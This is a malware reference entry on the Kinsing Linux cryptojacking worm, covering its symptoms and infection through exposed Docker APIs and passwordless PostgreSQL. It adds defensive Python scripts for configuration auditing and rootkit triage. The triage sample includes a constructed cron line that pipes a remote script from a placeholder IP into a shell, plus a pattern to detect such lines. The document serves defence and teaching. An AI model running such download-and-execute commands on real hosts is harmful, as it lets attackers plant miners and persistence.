
Kinsing

Category: Malware

Type: Cryptojacking malware / worm

Platform: Linux

Variants: Multiple evolving versions with rootkit and mining capabilities

Damage potential: Mines cryptocurrency on hosts reached through misconfigured Docker daemon APIs and PostgreSQL services, consumes CPU and memory, spreads laterally to other exposed hosts, and hides its processes with a user-mode rootkit to evade detection.

Overview

Discovered in late 2019 and gaining attention in early 2020, Kinsing is a malware family primarily targeting Linux environments, especially cloud-native infrastructures and containerized applications. It functions as a cryptojacking tool that mines cryptocurrency, typically Monero, while maintaining persistent access to infected systems.

Kinsing employs lateral movement techniques to spread across networks and uses a user-mode rootkit to hide its processes and files, which makes it difficult to detect and remove. Kinsing also kills competing malware and miners and tunes the infected host so that its own mining gets the available CPU.

Cybercriminals use Kinsing to exploit misconfigurations and vulnerabilities in Linux-based cloud and container platforms. Their goal is to maximize illicit cryptocurrency mining and maintain control over compromised hosts. Kinsing evolves constantly and relies on stealth capabilities, which makes it a persistent threat in modern Linux ecosystems.

Possible symptoms

Kinsing may degrade system performance and compromise system integrity by running resource-intensive cryptocurrency mining processes and hiding malicious activity. Symptoms of a Kinsing infection include:

  • Sluggish or unresponsive system performance.
  • Unusual network activity or unexpected outbound connections to unknown IP addresses.
  • Increased CPU or memory usage due to mining operations.
  • Unknown or suspicious processes running on the system, often with names mimicking legitimate services.
  • Hidden processes or files, and unexpected shared libraries preloaded by a user-mode rootkit (on Linux, typically an entry in /etc/ld.so.preload that hooks process enumeration).
  • Removal or disabling of competing malware and resource-heavy services.
  • Difficulty detecting or terminating malicious processes due to rootkit-based hiding techniques.
  • Suspicious activity related to Docker containers or PostgreSQL services.

Sources of the infection

Cybercriminals use several methods to spread the Kinsing malware:

  • Exploiting misconfigurations and vulnerabilities. Kinsing targets Docker daemon APIs exposed on the network without authentication, PostgreSQL instances that accept connections without a password, and other exposed cloud-native services to gain initial access.
  • Scanning for vulnerable hosts. After infection, Kinsing scans the network for other exposed services and systems that it can compromise, extending its reach laterally.
  • Direct exploitation of exposed APIs. An unauthenticated Docker API lets Kinsing start a container of its choosing and run its payload on the host, bypassing perimeter defenses that only inspect inbound traffic to "real" applications.
  • Use of automated scripts. The malware employs shell scripts to automate installation, mining setup, rootkit deployment, and removal of competing processes.
  • No need for user interaction. Kinsing does not require users to open files or click links — it exploits exposed services and network misconfigurations to infect systems automatically.

Protection

The best way to protect against Kinsing is to secure cloud and Linux environments by addressing common misconfigurations and vulnerabilities. Effective measures to protect against Kinsing include:

  • Using antivirus and anti-malware software. Install and regularly update reliable security solutions that include detection for Linux-based malware and cryptojacking threats.
  • Regularly updating systems and software. Keep the operating system, container platform, and all applications up to date to close the software vulnerabilities Kinsing exploits. Note that an exposed Docker API and passwordless PostgreSQL access are configuration errors rather than bugs; patching does not fix them, the access controls below do.
  • Improving network security. Configure firewalls, intrusion detection systems, and endpoint protection to restrict access to exposed services and block suspicious outbound traffic to C2 servers.
  • Restricting access to Docker and database APIs. Do not bind the Docker daemon API to a network interface unless it is protected with TLS client-certificate authentication (tlsverify), and prefer the Unix socket alone. Keep PostgreSQL on a private network, restrict the addresses allowed in pg_hba.conf, and require password authentication (scram-sha-256) instead of trust. Reach these services through network segmentation or a VPN rather than the public Internet.
  • Disabling unnecessary services. Turn off any unused or unnecessary network services, container APIs, or database instances to reduce attack surfaces.
  • Implementing multi-factor authentication (MFA). Use MFA to protect critical administrative accounts and cloud infrastructure to prevent unauthorized access.
  • Monitoring system and network activity. Use logging and monitoring tools to detect unusual CPU usage, network connections, or hidden processes that may indicate cryptomining or rootkit activity.
  • Using container security best practices. Regularly scan container images for vulnerabilities, enforce least privilege, and apply runtime protection to detect and block suspicious behavior.
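The two misconfigurations the list above keeps returning to can be checked mechanically. The following Python audit is an added example, not code from the page or from any Kinsing analysis: it parses a Docker daemon.json and a PostgreSQL pg_hba.conf and reports tcp:// listeners without tlsverify and network host rules that use trust or password, or that admit every address without TLS. The weak and hardened configuration samples are constructed for the illustration.

```python
"""Audit the exposures Kinsing's scanners look for: an unauthenticated Docker
daemon API on TCP and PostgreSQL host rules that admit clients without a
password. Added example; the configuration samples are constructed."""
import json

# Constructed sample: the weak settings (API on every interface, no TLS; trust from anywhere).
WEAK_DAEMON_JSON = '''{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}'''
WEAK_PG_HBA = """# TYPE  DATABASE  USER  ADDRESS       METHOD
local   all       all                 peer
host    all       all   0.0.0.0/0     trust
host    all       all   ::/0          trust
"""

# Constructed sample: the same services hardened.
HARDENED_DAEMON_JSON = '''{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}'''
HARDENED_PG_HBA = """local   all       all                 peer
hostssl all       all   10.0.0.0/8    scram-sha-256
"""

ANY_ADDRESS = {"0.0.0.0/0", "::/0", "all"}
WEAK_METHODS = {"trust", "password"}          # no authentication, or cleartext password
ADDRESS_KEYWORDS = {"all", "samehost", "samenet"}


def docker_api_findings(daemon_json_text):
    """Flag tcp:// listeners that run without client-certificate verification."""
    cfg = json.loads(daemon_json_text)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # the Unix socket is protected by filesystem permissions
        addr = host[len("tcp://"):]
        if not cfg.get("tlsverify"):
            findings.append(f"docker: API on {addr} accepts any client (no tlsverify)")
        if addr.startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"docker: API bound to every interface ({addr})")
    return findings


def pg_hba_findings(pg_hba_text):
    """Flag network rules using trust/password, and any-address rules without TLS."""
    findings = []
    for raw in pg_hba_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        conn_type = fields[0]
        if conn_type == "local" or len(fields) < 5:
            continue  # Unix-socket rules are not reachable from the network
        address = fields[3]
        # ADDRESS is a CIDR, a keyword, or an IP followed by a separate netmask column.
        if "/" in address or address in ADDRESS_KEYWORDS:
            method = fields[4]
        elif len(fields) >= 6:
            method = fields[5]
        else:
            continue
        if method in WEAK_METHODS:
            findings.append(f"postgres: {conn_type} rule for {address} uses '{method}'")
        if address in ANY_ADDRESS and conn_type != "hostssl":
            findings.append(f"postgres: {address} admitted without requiring TLS")
    return findings


def audit(daemon_json_text, pg_hba_text):
    """All findings for one host's Docker and PostgreSQL configuration."""
    return docker_api_findings(daemon_json_text) + pg_hba_findings(pg_hba_text)


if __name__ == "__main__":
    for label, dj, hba in (("weak", WEAK_DAEMON_JSON, WEAK_PG_HBA),
                           ("hardened", HARDENED_DAEMON_JSON, HARDENED_PG_HBA)):
        print(label, audit(dj, hba) or ["no findings"])
```

Run it against real files by reading /etc/docker/daemon.json and the pg_hba.conf path reported by `SHOW hba_file;`. One practical caveat: the official postgres container image started with POSTGRES_HOST_AUTH_METHOD=trust writes a `host all all all trust` rule, which is why the checker treats the address keyword `all` like 0.0.0.0/0.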

Removal of Kinsing

If you suspect Kinsing has infected your system, immediately isolate the affected host from the network to stop lateral movement. Identify and terminate suspicious processes, especially the miner and the rootkit components. Because a user-mode rootkit hides processes from ps and top, enumerate /proc by PID number rather than by listing the directory, and compare the two views.

Use trusted Linux-compatible antivirus or malware removal tools to scan and clean the system. Manually check for and remove malicious scripts, cron jobs that re-download the payload, preloaded rootkit libraries (and the /etc/ld.so.preload entry that loads them), and unauthorized Docker containers or services.

After removal, update all software, container platforms, and security configurations to close exploited vulnerabilities. Review access controls on Docker APIs and databases to prevent reinfection.

If you cannot fully remove Kinsing or the rootkits persist, seek help from cybersecurity experts for thorough remediation.
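The triage steps above (find processes the rootkit hides, check what is preloaded, look for re-infection hooks) can be scripted. The following Python is an added example, not Kinsing's code and not from the page: it enumerates /proc by probing PID numbers with stat() rather than readdir(), since a preload rootkit that hooks readdir() filters ps, top and os.listdir but not a direct stat of /proc/<pid>; it lists /etc/ld.so.preload entries; and it picks out cron lines that pipe a download straight into a shell. The sample host state at the bottom (library name, PIDs, crontab, the 203.0.113.7 address) is constructed for the illustration.

```python
"""Triage for a Linux host that may run a user-mode rootkit. Added example;
the sample host state is constructed, not captured from a real infection."""
import os
import re

DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def preload_entries(text):
    """Libraries listed in /etc/ld.so.preload; a clean host normally has none."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def listed_pids(names):
    """PIDs that appear in a readdir()-based listing of /proc (the hooked view)."""
    return [int(n) for n in names if n.isdigit()]


def probe_pids(pid_max, exists=os.path.exists):
    """Enumerate PIDs by probing /proc/<n> one number at a time (stat, not readdir)."""
    return [n for n in range(1, pid_max + 1) if exists(f"/proc/{n}")]


def hidden_pids(listed, probed):
    """PIDs reachable by number but absent from the directory listing."""
    return sorted(set(probed) - set(listed))


def download_pipe_cron_lines(crontab_text):
    """Cron entries that fetch a remote script and pipe it into sh/bash."""
    return [ln for ln in crontab_text.splitlines() if DOWNLOAD_TO_SHELL.search(ln)]


def triage(preload_text, proc_listing, pid_max, exists, crontab_text):
    """Combine the three checks into one report."""
    return {
        "preload": preload_entries(preload_text),
        "hidden_pids": hidden_pids(listed_pids(proc_listing), probe_pids(pid_max, exists)),
        "cron": download_pipe_cron_lines(crontab_text),
    }


# ---- constructed sample host state (names, PIDs and address are hypothetical) ----
SAMPLE_PRELOAD = "/usr/local/lib/libhidden.so\n"
SAMPLE_PROC_LISTING = ["1", "2", "self", "cpuinfo", "4231"]   # what readdir() returned
SAMPLE_REAL_PIDS = {1, 2, 4231, 4242}                          # what actually exists
SAMPLE_CRONTAB = """# m h dom mon dow user command
*/1 * * * * root curl -fsSL http://203.0.113.7/update.sh | sh
0 3 * * *   root /usr/bin/logrotate /etc/logrotate.conf
"""


def sample_exists(path):
    """Stand-in for os.path.exists over the constructed PID set."""
    return int(path.rsplit("/", 1)[1]) in SAMPLE_REAL_PIDS


def sample_triage():
    return triage(SAMPLE_PRELOAD, SAMPLE_PROC_LISTING, 5000, sample_exists, SAMPLE_CRONTAB)


def live_triage(pid_max=None):
    """Run the same checks against the local host (Linux only)."""
    def read(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    if pid_max is None:
        pid_max = int(read("/proc/sys/kernel/pid_max") or 32768)
    return triage(read("/etc/ld.so.preload"), os.listdir("/proc"), pid_max,
                  os.path.exists, read("/etc/crontab"))


if __name__ == "__main__":
    print(sample_triage())
```

For each hidden PID reported by live_triage, read /proc/<pid>/comm, /proc/<pid>/exe and /proc/<pid>/cmdline before killing it, and remove the preload entry before terminating the process, otherwise the cron hook simply restarts it. The probe only defeats user-mode hiding; a kernel-mode rootkit can filter stat() as well, and /etc/cron.d and per-user crontabs need the same cron check.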